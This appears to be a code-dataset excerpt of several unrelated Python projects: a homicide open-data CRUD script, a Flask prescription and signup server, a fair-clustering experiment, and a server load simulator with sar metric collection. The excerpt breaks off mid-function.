'http://catalogo.datosabiertos.gob.ec/api/action/datastore_search?resource_id=8513f446-1c94-426e-8592-d4cbdd295f33&limit=1000' datos = pd.read_json(url, typ='frame') datos =pd.DataFrame.from_dict(datos["result"]["records"]).set_index("_id") def guardar_bdd(): global datos datos.to_csv('./data/bdd_homicidios.csv', encoding='utf-8') def consultar(columna, id=None): global datos #print(datos.loc[int(id),columna]) return datos.loc[int(id),columna] if id else datos[columna] def modificar(columna,id,nuevo_valor): global datos if consultar(columna, id): datos.at[int(id),columna] = nuevo_valor guardar_bdd() return True else: return False def eliminar(index): global datos datos.drop(datos.index[int(index)-1], inplace=True) guardar_bdd() def insertar(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz): global datos homicidio=Homicidio(Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz) s = homicidio.get_list() serie = pd.Series(s,index=datos.columns) datos = datos.append(serie,ignore_index=True) guardar_bdd() class Homicidio: def __init__(self,Canton,Circuito,Distrito,Edad,Estado_Civil,Fecha_infraccion,Hora_infraccion,Nacionalidad,Provincia,Sexo,Zona,tipo_muert_matriz): self.Canton=Canton self.Circuito=Circuito self.Distrito=Distrito self.Edad = Edad self.Estado_civil=Estado_Civil self.Fecha_infraccion=Fecha_infraccion self.Hora_infraccion=Hora_infraccion self.Nacionalidad=Nacionalidad self.Provincia = Provincia self.Sexo = Sexo self.Zona = Zona self.tipo = tipo_muert_matriz def get_list(self): return [self.Canton,self.Circuito,self.Distrito,self.Edad,self.Estado_civil,self.Fecha_infraccion, self.Hora_infraccion,self.Nacionalidad,self.Provincia,self.Sexo,self.Zona,self.tipo] def menu(): print("Que desea hacer:") print("1. Crear:") print("2. Modificar") print("3 Consultar") print("4. Eliminar") opcion = input("Opcion: ") if opcion == "1": Canton = input("Canton: ") Circuito = input("Circuito: ") Distrito = input("Distrito: ") Edad = input("Edad: ") Estado_civil = input("Estado civil: ") Fecha_infraccion = input("Fecha infraccion: ") Hora_infraccion = input("Hora infraccion: ") Nacionalidad = input("Nacionalidad: ") Provincia = input("Provincia: ") Sexo = input("Sexo: ") Zona = input("Zona: ") Tipo = input("Tipo: ") insertar(Canton, Circuito, Distrito, Edad, Estado_civil, Fecha_infraccion, Hora_infraccion, Nacionalidad, Provincia, Sexo, Zona, Tipo) if opcion == "2": columna = input("Columna: ") id = input("id: ") nuevo_valor = input("nuevo_valor: ") modificar(columna,id,nuevo_valor) if opcion == "3": columna = input("Columna: ") id = input("id: ") print(consultar(columna, id)) if opcion == "4": id = input("id: ") eliminar(id) menu() menu() ```
{ "source": "2018-BigBio-MedicalData-Hackathon/server", "score": 3 }
#### File: 2018-BigBio-MedicalData-Hackathon/server/agency.py ```python from flask import Flask, request, jsonify, json from flask_restful import reqparse, Api, Resource import config import dbconnect import json app = Flask(__name__) api = Api(app) # MySQL 연결 cursor = dbconnect.cursor conn = dbconnect.conn # /Agency 구현 class Agency(Resource): #병원이 보내는 처방전 서버에 저장하기 def post(self): try: # json 데이터 post로 받아서 변수 저장 _content = request.get_json() _insurance = _content['insurance'] _nursesign = _content['nursing_institution_sign'] _grantnum = _content['grant_number'] _patientname = _content['patient']['name'] _patientreginum = _content['patient']['registration_number'] _insname = _content["medical_Institutions"]["name"] _insphonenum = _content["medical_Institutions"]["phone_number"] _insfaxnum = _content["medical_Institutions"]["fax_number"] _insemail = _content["medical_Institutions"]["email_address"] _diseasecode1 = _content["disease_classification_codes"][0] _diseasecode2 = _content["disease_classification_codes"][1] _doctorname = _content["sign_of_prescription_medical_practitioner"] _doctortype = _content["license_type"] _doctornum = _content["license_number"] _mediname = [] _medidose = [] _medidailydose = [] _meditotalday = [] _mediusage = [] _mediinside = [] for data in _content["prescription_medicine"]: _mediname.append(data["name_of_medicines"]) _medidose.append(data["one_dose"]) _medidailydose.append(data["number_of_daily_doses"]) _meditotalday.append(data["total_dosing_days"]) _mediusage.append(data["usage"]) _mediinside.append(data["inside"]) _usepreiod = _content["injection_prescription"]["period_of_use"] _dispensename = _content["injection_prescription"]["preparation"]["name_of_dispenser"] _pharmacistname = _content["injection_prescription"]["preparation"]["pharmacist"]["name"] _pharmacistseal = _content["injection_prescription"]["preparation"]["pharmacist"]["seal"] _preparationamount = _content["injection_prescription"]["preparation_amount"] _preparationyear = _content["injection_prescription"]["year_of_preparation"] _changeprescription = _content["injection_prescription"]["change_of_prescription"] _query = "INSERT INTO prescription(insurance, nurse_sign, grant_num, patient_name, patient_reginum, ins_name, ins_phonenum, ins_fax, ins_email, diseasecode_1, diseasecode_2, doctor_name, doctor_type, doctor_num, medi_name, medi_dose, medi_dailydose, medi_totalday, medi_usage, medi_inside, period_use, dispenser_name, pharmacist_name, pharmacist_seal, preparation_amount, year_preparation, change_prescription) values( %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s)" print(_query) _value = (_insurance ,_nursesign, _grantnum, _patientname ,_patientreginum ,_insname , _insphonenum , _insfaxnum , _insemail ,str(_diseasecode1) ,str(_diseasecode2),_doctorname , _doctortype , _doctornum ,str(_mediname) ,str(_medidose) ,str(_medidailydose) ,str(_meditotalday) , str(_mediusage) ,str(_mediinside) ,_usepreiod ,_dispensename ,_pharmacistname , _pharmacistseal , _preparationamount ,_preparationyear , _changeprescription ) print(_value) cursor.execute(_query, _value) _data = cursor.fetchall() print(_data) if not _data: conn.commit() return {"Register Success": 200} else: conn.rollback() return {"Register Failed": 404} except Exception as e: return {'error': e} def get(self): try: # json 데이터 post로 받아서 변수 저장 _query = "select * from prescription" cursor.execute(_query) _data = cursor.fetchall() result= [] for data in _data: _insurance = data[1] _nursesign = data[2] _grantnum = data[3] _patientname = data[4] _patientreginum = data[5] _insname = data[6] _insphonenum = data[7] _insfaxnum = data[8] _insemail = data[9] _diseasecode1 = data[10] _diseasecode2 = data[11] _doctorname = data[12] _doctortype = data[13] _doctornum = data[14] _mediname = data[15] _medidose = data[16] _medidailydose = data[17] _meditotalday = data[18] _mediusage = data[19] _mediinside = data[20] _usepreiod = data[21] _dispensename = data[22] _pharmacistname = data[23] _pharmacistseal = data[24] _preparationamount = data[25] _preparationyear = data[26] _changeprescription = data[27] tempjson= { "insurance":_insurance ,"nursesign": _nursesign,"grantnum": _grantnum , "patientname":_patientname ,"patientreginum" :_patientreginum ,"insname" : _insname ,"insphonenum": _insphonenum ,"insfaxnum": _insfaxnum , "insemail": _insemail ,"diseasecode1": _diseasecode1 ,"diseasecode2": _diseasecode2,"doctorname": _doctorname ,"doctortype": _doctortype ,"doctornum": _doctornum ,"mediname": _mediname ,"medidose": _medidose ,"medidailydose":_medidailydose ,"meditotalday" :_meditotalday , "mediusage":_mediusage ,"mediinside": _mediinside ,"usepreiod": _usepreiod ,"dispensename": _dispensename ,"pharmacistname": _pharmacistname , "pharmacistseal": _pharmacistseal ,"preparationamount": _preparationamount ,"preparationyear": _preparationyear , "changeprescription": _changeprescription } result.append(tempjson) # resultjson = json.dumps(result) return result except Exception as e: return {'error': e} ``` #### File: 2018-BigBio-MedicalData-Hackathon/server/signup.py ```python from flask import Flask, render_template, Response, request, session from flask_restful import Resource, Api from flask_restful import reqparse import config import random import hashlib import dbconnect app = Flask(__name__) api = Api(app) # MySQL 연결 cursor = dbconnect.cursor conn = dbconnect.conn # salt 생성 def salt(): alphabet = "0123456789abcdefghijklmnopqrstuvwxyz" + \ "ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%()" chars = [] for i in range(32): chars.append(random.choice(alphabet)) return "".join(chars) # salt+passwd로 passwd 만들기 def makepasswd(passwd, salt): _data = str.encode(passwd + salt) _hash = hashlib.sha256() _hash.update(_data) return _hash.hexdigest() class Signup(Resource): def post(self): try: print(1) # 지역변수로 로그인 폼 데이터 POST 받기 설정 _parser = reqparse.RequestParser() _parser.add_argument('user_id', type=str) _parser.add_argument('user_pw', type=str) _parser.add_argument('user_pwconfirm', type=str) _parser.add_argument('username', type=str) _parser.add_argument('user_reginum', type=str) _parser.add_argument('phonenum', type=int) _parser.add_argument('emailfirst', type=str) _parser.add_argument('emailsecond', type=str) _args = _parser.parse_args() print(2) # 변수에 할당 print(_args) _userid = _args['user_id'] _password = _args['<PASSWORD>'] _passwordconfirm = _args['<PASSWORD>'] _username = _args['username'] _reginum = _args['user_reginum'] _phonenum = _args['phonenum'] _emailfirst = _args['emailfirst'] _emailsecond = _args['emailsecond'] _email = _emailfirst+ "@" + _emailsecond _salt = salt() _newpassword = makepasswd(_password, _salt) print(3) print(_email) # # user 중복체크 # _query = "select 1 from user where user_pw=%s" % (_password) # cursor.execute(_query) # _data = cursor.fetchall() # print(_data) # if _data: # return {"duplicate": 401} # 비밀번호 체크 if _password != _passwordconfirm: return {"not match password": 404} # gender 구하기 if _reginum[6] == "1" or _reginum[6] == "3": _gender = "male" elif _reginum[6] == "2" or _reginum[6] == "4": _gender = "female" else: return {"Register number Not valid": 404} _query = "INSERT INTO user(user_id, user_pw, salt, username, user_reginum, phonenum, email, gender) values(%s, %s, %s, %s, %s, %s, %s, %s)" print(_query) _value = (_userid, _newpassword, _salt, _username, _reginum, str(_phonenum), _email, _gender) print(_value) cursor.execute(_query, _value) _data = cursor.fetchall() print(_data) if not _data: conn.commit() return {"Register Success": 200} else: conn.rollback() return {"Register Failed": 404} except Exception as e: return {'error': "e"} ```
{ "source": "2018csb1082/Fair_Clustering", "score": 3 }
#### File: 2018csb1082/Fair_Clustering/Fair_Clustering.py ```python import pandas as pd import numpy as np import math import random import time import io import random import statistics from itertools import combinations # from google.colab import files # uploaded = files.upload() n=400 k=2 # creating data to be used bank=pd.read_csv("D:/personel/codez/btp/trial/bank-original.csv",sep=";") bank=bank.drop(['y','job','education','month','default','housing','loan','contact','day','pdays','previous','poutcome','campaign'],1) bank=bank.drop(bank[bank['marital']=='divorced'].index) gama=np.array(bank['marital']) bank=bank.drop('marital',1) raw_data=np.array(bank[0:n][:]) data = [list(raw_data[i]) for i in range(n)] avg0 = avg1 = avg2 = 0 for i in range(n): avg0 += data[i][0] avg1 += data[i][1] avg2 += data[i][2] avg0 = avg0/n avg1 = avg1/n avg2 = avg2/n col0 = [data[i][0] for i in range(n)] col1 = [data[i][1] for i in range(n)] col2 = [data[i][2] for i in range(n)] var0 = math.sqrt(statistics.variance(col0)) var1 = math.sqrt(statistics.variance(col1)) var2 = math.sqrt(statistics.variance(col2)) for i in range(n): data[i][0] = (data[i][0]-avg0)/var0 data[i][1] = (data[i][1]-avg1)/var1 data[i][2] = (data[i][2]-avg2)/var2 # print(len(data)) # print(data) col1 = [data[i][0] for i in range(n)] col2 = [data[i][1] for i in range(n)] col3 = [data[i][2] for i in range(n)] print(avg0,avg1,avg2) print(max(col1),max(col2),max(col3)) print(min(col1),min(col2),min(col3)) # creating data to be used data_group=[gama[i] for i in range(n)] i=0 while (i<n): if data_group[i] == 'married': data_group[i] = 1 if data_group[i] == 'single': data_group[i] = 0 i += 1 start=time.time() print(len(data_group)) print(data_group) # creating data to be used distances = np.zeros((n, n)) avg_dist = i = count = 0 while i < n: j = 0 while j < n: # distances[i][j] = math.sqrt(((data[i][0]-data[j][0])*(data[i][0]-data[j][0]))+((data[i][1]-data[j][1])*(data[i][1]-data[j][1]))+((data[i][2]-data[j][2])*(data[i][2]-data[j][2]))) distances[i][j] = abs(((data[i][0]-data[j][0]))+((data[i][1]-data[j][1]))+((data[i][2]-data[j][2]))) avg_dist += distances[i][j] count += 1 j += 1 i += 1 avg_dist = avg_dist/count print(avg_dist) # creating data to be used # not using anymore -- depricated # indices = [i for i in range(n)] # comb = list(combinations(indices, k)) # random.shuffle(comb) # for i in comb: # print(i) # defining cost function def cost_function(): group_cost = [0,0] count_g0 = count_g1 = 0 for i in range(n): curr_group = data_group[i] curr_center = assignment[i] count_g0 = count_g0 + 1 if curr_group == 0 else count_g0 count_g1 = count_g1 + 1 if curr_group == 1 else count_g1 group_cost[curr_group] = group_cost[curr_group] + distances[i][curr_center] group_cost[0] = group_cost[0]/count_g0 if count_g0 != 0 else math.inf group_cost[1] = group_cost[1]/count_g1 if count_g1 != 0 else math.inf # print(group_cost) return max(group_cost[0],group_cost[1]) starting_centers = [] starting_centers.append(random.randint(0,n-1)) starting_centers.append(random.randint(0,n-2)) if starting_centers[1] > starting_centers[0] - 1: starting_centers[1] += 1 print(starting_centers) chosen_centers = starting_centers centers = starting_centers print(centers) chosen_assignment = [0]*n assignment = [0]*n for i in range(n): minn = math.inf for j in range(k): curr_center = centers[j] curr_distance = distances[i][curr_center] if (curr_distance < minn): minn = curr_distance assignment[i] = j chosen_assignment = assignment print(assignment) min_cost = cost_function() print(min_cost) # OLD METHOD FOR ITERATING OVER CENTERS # not using anymore -- depricated # alfa = 1 # while alfa<len(comb): # centers = comb[alfa] # for i in range(n): # minn = math.inf # for j in range(k): # curr_center = centers[j] # curr_distance = distances[i][curr_center] # if (curr_distance < minn): # minn = curr_distance # assignment[i] = j # curr_cost = cost_function() # min_cost = curr_cost if curr_cost<min_cost else min_cost # chosen_centers = comb[alfa] if curr_cost<min_cost else chosen_centers # chosen_assignment = assignment if curr_cost<min_cost else chosen_assignment # if alfa%200 ==0: # print("alfa: ",alfa) # print("cost: ", min_cost) # print("centers: ", comb[alfa]) # alfa+=1 # print("FINAL:") # print(min_cost, chosen_centers) # print(chosen_assignment) flag = 0 alpha = 0 while (flag != 1): alpha += 1 if alpha%10 == 0: print(alpha) flag = 1 # Check if any other point is a better center r = list(range(n)) random.shuffle(r) for c in r: centers = list(chosen_centers) # Try replacing first center if (c != centers[0] and c != centers[1]): # set new center centers[0] = c # do new assignment for i in range(n): minn = math.inf for j in range(k): curr_center = centers[j] curr_distance = distances[i][curr_center] if (curr_distance < minn): minn = curr_distance assignment[i] = j # calculate new cost curr_cost = cost_function() # change variables if new cost is better if curr_cost<min_cost: min_cost = curr_cost chosen_centers = centers chosen_assignment = assignment flag = 0 break centers = list(chosen_centers) # Try replacing second center if (c != centers[1] and c != centers[0]): # set new center centers[1] = c # do new assignment for i in range(n): minn = math.inf for j in range(k): curr_center = centers[j] curr_distance = distances[i][curr_center] if (curr_distance < minn): minn = curr_distance assignment[i] = j # calculate new cost curr_cost = cost_function() # change variables if new cost is better if curr_cost<min_cost: min_cost = curr_cost chosen_centers = centers chosen_assignment = assignment flag = 0 break print("FINAL:") print(min_cost, chosen_centers) print(chosen_assignment) end = time.time() print("Time taken: ", end-start) import matplotlib.pyplot as plt fig = plt.figure() ax = fig.add_subplot(111, projection='3d') for i in range(n): xs = data[i][0] ys = data[i][1] zs = data[i][2] if chosen_centers[0] == i or chosen_centers[1] == i: c = 'red' else: if chosen_assignment[i] == 0: if data_group[i] == 0: c = 'navy' else: c = 'violet' else: if data_group[i] == 0: c = 'yellow' else: c = 'lime' ax.scatter(xs, ys, zs, c=c, marker='o') ax.set_xlabel('Normalized Age') ax.set_ylabel('Normalized Balance') ax.set_zlabel('Normalized Duration') ax.set_title('Best Cluster') plt.show() ```
{ "source": "2018SEUer/LoadSimulator-Measuring", "score": 2 }
#### File: LoadSimulator-Measuring/Master Program/loadRunner.py ```python from concurrent.futures import ThreadPoolExecutor import subprocess, re, time import os,sys,math,threading import socket # 全局变量的设定与初始化(!核心数和最大频率需要自行设定) global cores_num global freq_max cores_num = 12 # CPU核心数量 freq_max = 2100 # CPU最大频率 level = [0,0,0,0,0,0,0,0,0,0,0] # 各项负载等级 tslp = 10000 # sleep time t = 100000 # time network = '192.168.0.1' # 用于网络加压 TCPwindow = 10 # 用于网络加压 ''' CPU ''' # 根据百分比设置相应的频率 def freq_calculator(): freq_av=int(freq_max/10) level[1]=freq_av for n in range (2,11): level[n]=level[n-1]+freq_av # 获取当前开启的CPU核心数量 def cores_on_num(): grep_info=subprocess.Popen('''grep "processor" /proc/cpuinfo''', shell=True, stdout=subprocess.PIPE) out0, err0=grep_info.communicate() grep_str=out0.decode(encoding='utf-8', errors='ignore') cores_on_num=len(re.findall('processor', grep_str)) return cores_on_num # FUNC 1: 开启n个核心,参数为需要开启的核心数 def cores_on(n): global cores_num if int(n)>cores_num or int(n)==0: raise Exception("wrong") num=cores_on_num() if int(n)>num: for i in range(int(n)-num): subprocess.call("echo '1' > /sys/devices/system/cpu/cpu%s/online"%str(num+i), shell=True) if int(n)<num: for i in range(num-int(n)): subprocess.call("echo '0' > /sys/devices/system/cpu/cpu%s/online"%str(num-i-1), shell=True) # FUNC 2: 将所有开启的核心数的频率限制在目标频率 def freq_set(f): subprocess.call('cpupower frequency-set -f %s'%str(f), shell=True) # FUNC 3: 给当前开启的核心进行加压,参数为加压百分比 def stress(s,t,tslp): lookbusy_p=subprocess.Popen('lookbusy -c %s --quiet'%(str(s)), shell=True) time.sleep(t) # 杀死lookubusy加压进程 subprocess.call('pkill -9 lookbusy', shell=True) time.sleep(tslp) ''' disk ''' def diskstress(e,t,tslp): # 定义无限循环量,十个不同层级来定义硬盘io负载 var=0 T0=time.time() if e==0: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 4K -I') if e==1: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 128K -I') if e==2: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 640K -I') if e==3: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 2048K -I') if e==4: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 4608K -I') if e==5: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 8M -I') if e==6: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 10M -I') if e==7: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 32M -I') if e==8: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 128M -I') if e==9: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 512M -I') if e==10: while(time.time()-T0<=t): os.system('iozone -i 0 -r 4K -s 1024M -I') print('disk success!') time.sleep(tslp) ''' memory ''' def memorystress(z,t,tslp): sar_r_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_r_info.communicate() sar_r_str=out0.decode(encoding='utf-8', errors='ignore') lines_r=len(sar_r_str.split('\n')) sar_r_str=sar_r_str.split('\n') for i in range(0,lines_r-1): count_r=len(sar_r_str[i].split()) sar_r_str[i]=sar_r_str[i].split() if count_r==17: for j in range(0,count_r): try: sar_r_str[i][j]=float(sar_r_str[i][j]) except ValueError: sar_r_str[i][j]=sar_r_str[i][j] if sar_r_str[i][1]!='kbmemfree': m=int(z)*10+30-sar_r_str[i][4]; m=int(m*(sar_r_str[i][1]+sar_r_str[i][2])/100) str_m='stress --vm 1 --vm-bytes '+str(m)+'K --vm-hang 100 --timeout '+str(t)+'s' stress_r_info=subprocess.Popen(str_m, shell=True, stdout=subprocess.PIPE) time.sleep(int(tslp)) ''' network ''' def networkstress(network,TCPwindow,j,t,tslp): TCPwindow=int(TCPwindow)*float(j) TCPwindow=str(TCPwindow)+'M' str_sys='iperf3 -c %s -b %s -d m -t '+str(t) # TCP模式加压 os.system(str_sys%(network,TCPwindow)) time.sleep(tslp) #---------------------------------# # main函数 # #---------------------------------# if __name__ == "__main__": #-----------更新部分全局变量----------- # 将当前cpu核心数赋值给全局变量core_num cores_num=cores_on_num() # 设置cpu核心的最大频率 freq_max=800000000 freq_calculator() pool=ThreadPoolExecutor(max_workers=6) #-----------socket通信部分----------- # 创建一个tcp/ip协议的套接字 clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("-------------") print(clientSocket) print("-------------") # 服务端IP地址 (!需要自行设定) IP1 = "192.168.10.101" host = IP1 # 端口号 (!需要自行设定) port = 8008 buffer_size = 1024 address = (host, port) print("-------------") print(address) print("-------------") clientSocket.connect(address) print("等待服务端发送信息:") while(True): data = clientSocket.recv(1024) data = data.decode("utf-8") print(data) if data=="连接服务器成功": print(data) elif data=='STOP': pool.shutdown(wait=True) else : x=data.split() results = list(map(int, x)) cores_on(results[0]) freq_set(level[int(results[1]/10)]) pool.submit(stress,results[2],t,tslp) pool.submit(memorystress,results[3],t,tslp) pool.submit(diskstress,results[4],t) pool.submit(networkstress,network,TCPwindow,results[5],t,tslp) # __END__OF__LOADRUNNER_PY__ ``` #### File: LoadSimulator-Measuring/Master Program/sar.py ```python import socket, time, subprocess, sys, os, math, time, sqlite3 # 获取当前时间戳 def sar_collect(): datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S'))) return timestamp ''' date&time ''' # 获取当前日期 def getDate(): year=time.strftime('%Y') month=time.strftime('%m') day=time.strftime('%d') hour=time.strftime('%H') minute=time.strftime('%M') second=time.strftime('%S') print('打印当前日期:',year,month,day,hour,minute,second) return year,month,day,hour,minute,second # 将一定格式的日期时间字符串转换为Unix timestamp def dt_stamp(year, month, day, hour, minute, second): datetime=year+'-'+month+'-'+day+' '+hour+':'+minute+':'+second timestamp=int(time.mktime(time.strptime(datetime, '%Y-%m-%d %H:%M:%S'))) return timestamp ''' CPU ''' # 采集CPU的相关数据 def gather_cpu(): sar_gather='' sar_cpu_info=subprocess.Popen('sar -u ALL -P ALL 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_cpu_info.communicate() sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_cpu_str.split('\n')) sar_cpu_str=sar_cpu_str.split('\n') for i in range(0,lines): count_r=len(sar_cpu_str[i].split()) sar_cpu_str[i]=sar_cpu_str[i].split() if count_r==12: for j in range(0,count_r): try: sar_cpu_str[i][j]=float(sar_cpu_str[i][j]) except ValueError: sar_cpu_str[i][j]=sar_cpu_str[i][j] if sar_cpu_str[i][1]=="all": if j>=2: sar_gather+=str(sar_cpu_str[i][j]) sar_gather+=' ' return sar_gather # 采集CPU的频率 def gather_cpuMHz(): sar_gather='' sar_cpu_info=subprocess.Popen('sar -m CPU -P ALL 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_cpu_info.communicate() sar_cpu_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_cpu_str.split('\n')) sar_cpu_str=sar_cpu_str.split('\n') for i in range(0,lines): count_r=len(sar_cpu_str[i].split()) sar_cpu_str[i]=sar_cpu_str[i].split() if count_r==3: for j in range(0,count_r): try: sar_cpu_str[i][j]=float(sar_cpu_str[i][j]) except ValueError: sar_cpu_str[i][j]=sar_cpu_str[i][j] if sar_cpu_str[i][1]=="all": if j>=2: sar_gather+=str(sar_cpu_str[i][j]) sar_gather+=' ' return sar_gather ''' memory ''' # 采集内存的相关数据 def gather_memory(): sar_gather='' sar_mem_info=subprocess.Popen('sar -r ALL 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_mem_info.communicate() sar_mem_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_mem_str.split('\n')) sar_mem_str=sar_mem_str.split('\n') for i in range(0,lines): count_r=len(sar_mem_str[i].split()) sar_mem_str[i]=sar_mem_str[i].split() if count_r==16: for j in range(0,count_r): try: sar_mem_str[i][j]=float(sar_mem_str[i][j]) except ValueError: sar_mem_str[i][j]=sar_mem_str[i][j] if sar_mem_str[i][1]!="kbmemfree": if j>=3 and j!=4 and j!=5 and j!=6 and j!=12 : sar_gather+=str(sar_mem_str[i][j]) sar_gather+=' ' sar_mem_info=subprocess.Popen('sar -B 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_mem_info.communicate() sar_mem_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_mem_str.split('\n')) sar_mem_str=sar_mem_str.split('\n') for i in range(0,lines): count_r=len(sar_mem_str[i].split()) sar_mem_str[i]=sar_mem_str[i].split() if count_r==10: for j in range(0,count_r): try: sar_mem_str[i][j]=float(sar_mem_str[i][j]) except ValueError: sar_mem_str[i][j]=sar_mem_str[i][j] if sar_mem_str[i][1]!="pgpgin/s": if j>=1 and j!=7: sar_gather+=str(sar_mem_str[i][j]) sar_gather+=' ' return sar_gather ''' disk ''' # 采集磁盘的相关数据 def gather_disk(): sar_gather='' sar_disk_info=subprocess.Popen('sar -d 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_disk_info.communicate() sar_disk_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_disk_str.split('\n')) sar_disk_str=sar_disk_str.split('\n') for i in range(0,lines): count_r=len(sar_disk_str[i].split()) sar_disk_str[i]=sar_disk_str[i].split() if count_r==10: for j in range(0,count_r): try: sar_disk_str[i][j]=float(sar_disk_str[i][j]) except ValueError: sar_disk_str[i][j]=sar_disk_str[i][j] if sar_disk_str[i][1]=="dev8-0": if j>=2: sar_gather+=str(sar_disk_str[i][j]) sar_gather+=' ' return sar_gather ''' network ''' # 采集网络的相关数据 def gather_network(): sar_gather='' sar_net_info=subprocess.Popen('sar -n DEV 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_net_info.communicate() sar_net_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_net_str.split('\n')) sar_net_str=sar_net_str.split('\n') for i in range(0,lines): count_r=len(sar_net_str[i].split()) sar_net_str[i]=sar_net_str[i].split() if count_r==10: for j in range(0,count_r): try: sar_net_str[i][j]=float(sar_net_str[i][j]) except ValueError: sar_net_str[i][j]=sar_net_str[i][j] if sar_net_str[i][1]=="wlp3s0": if j>=2: sar_gather+=str(sar_net_str[i][j]) sar_gather+=' ' sar_net_info=subprocess.Popen('sar -n EDEV 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_net_info.communicate() sar_net_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_net_str.split('\n')) sar_net_str=sar_net_str.split('\n') for i in range(0,lines): count_r=len(sar_net_str[i].split()) sar_net_str[i]=sar_net_str[i].split() if count_r==11: for j in range(0,count_r): try: sar_net_str[i][j]=float(sar_net_str[i][j]) except ValueError: sar_net_str[i][j]=sar_net_str[i][j] if sar_net_str[i][1]=="wlp3s0": if j>=2: sar_gather+=str(sar_net_str[i][j]) sar_gather+=' ' return sar_gather ''' task ''' # 采集任务的相关数据 def gather_q(): sar_gather='' sar_task_info=subprocess.Popen('sar -q 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_task_info.communicate() sar_task_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_task_str.split('\n')) sar_task_str=sar_task_str.split('\n') for i in range(0,lines): count_r=len(sar_task_str[i].split()) sar_task_str[i]=sar_task_str[i].split() if count_r==7: for j in range(0,count_r): try: sar_task_str[i][j]=float(sar_task_str[i][j]) except ValueError: sar_task_str[i][j]=sar_task_str[i][j] if sar_task_str[i][1]!="runq-sz" and sar_task_str[i][0]!="Linux": if j>=1: sar_gather+=str(sar_task_str[i][j]) sar_gather+=' ' return sar_gather ''' interrupt ''' # 采集中断的相关数据 def gather_I(): sar_gather='' sar_intr_info=subprocess.Popen('sar -I 1 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_intr_info.communicate() sar_intr_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_intr_str.split('\n')) sar_intr_str=sar_intr_str.split('\n') for i in range(0,lines): count_r=len(sar_intr_str[i].split()) sar_intr_str[i]=sar_intr_str[i].split() if count_r==3: for j in range(0,count_r): try: sar_intr_str[i][j]=float(sar_intr_str[i][j]) except ValueError: sar_intr_str[i][j]=sar_intr_str[i][j] if sar_intr_str[i][1]!="INTR": if j==2: sar_gather+=str(sar_intr_str[i][j]) sar_gather+=' ' return sar_gather ''' process ''' # 采集I/O的相关数据 def gather_w(): sar_gather='' sar_prcs_info=subprocess.Popen('sar -w 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_prcs_info.communicate() sar_prcs_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_prcs_str.split('\n')) sar_prcs_str=sar_prcs_str.split('\n') for i in range(0,lines): count_r=len(sar_prcs_str[i].split()) sar_prcs_str[i]=sar_prcs_str[i].split() if count_r==3: for j in range(0,count_r): try: sar_prcs_str[i][j]=float(sar_prcs_str[i][j]) except ValueError: sar_prcs_str[i][j]=sar_prcs_str[i][j] if sar_prcs_str[i][1]!="proc/s": if j>=1: sar_gather+=str(sar_prcs_str[i][j]) sar_gather+=' ' return sar_gather ''' io ''' # 采集磁盘的相关数据 def gather_b(): sar_gather='' sar_io_info=subprocess.Popen('sar -b 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_io_info.communicate() sar_io_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_io_str.split('\n')) sar_io_str=sar_io_str.split('\n') for i in range(0,lines): count_r=len(sar_io_str[i].split()) sar_io_str[i]=sar_io_str[i].split() if count_r==6: for j in range(0,count_r): try: sar_io_str[i][j]=float(sar_io_str[i][j]) except ValueError: sar_io_str[i][j]=sar_io_str[i][j] if sar_io_str[i][1]!="tps": if j>=1: sar_gather+=str(sar_io_str[i][j]) sar_gather+=' ' return sar_gather ''' swap ''' # 采集交换区的相关数据 def gather_W(): sar_gather='' sar_swap_info=subprocess.Popen('sar -W 0', shell=True, stdout=subprocess.PIPE) out0, err0=sar_swap_info.communicate() sar_swap_str=out0.decode(encoding='utf-8', errors='ignore') lines=len(sar_swap_str.split('\n')) sar_swap_str=sar_swap_str.split('\n') for i in range(0,lines): count_r=len(sar_swap_str[i].split()) sar_swap_str[i]=sar_swap_str[i].split() if count_r==3: for j in range(0,count_r): try: sar_swap_str[i][j]=float(sar_swap_str[i][j]) except ValueError: sar_swap_str[i][j]=sar_swap_str[i][j] if 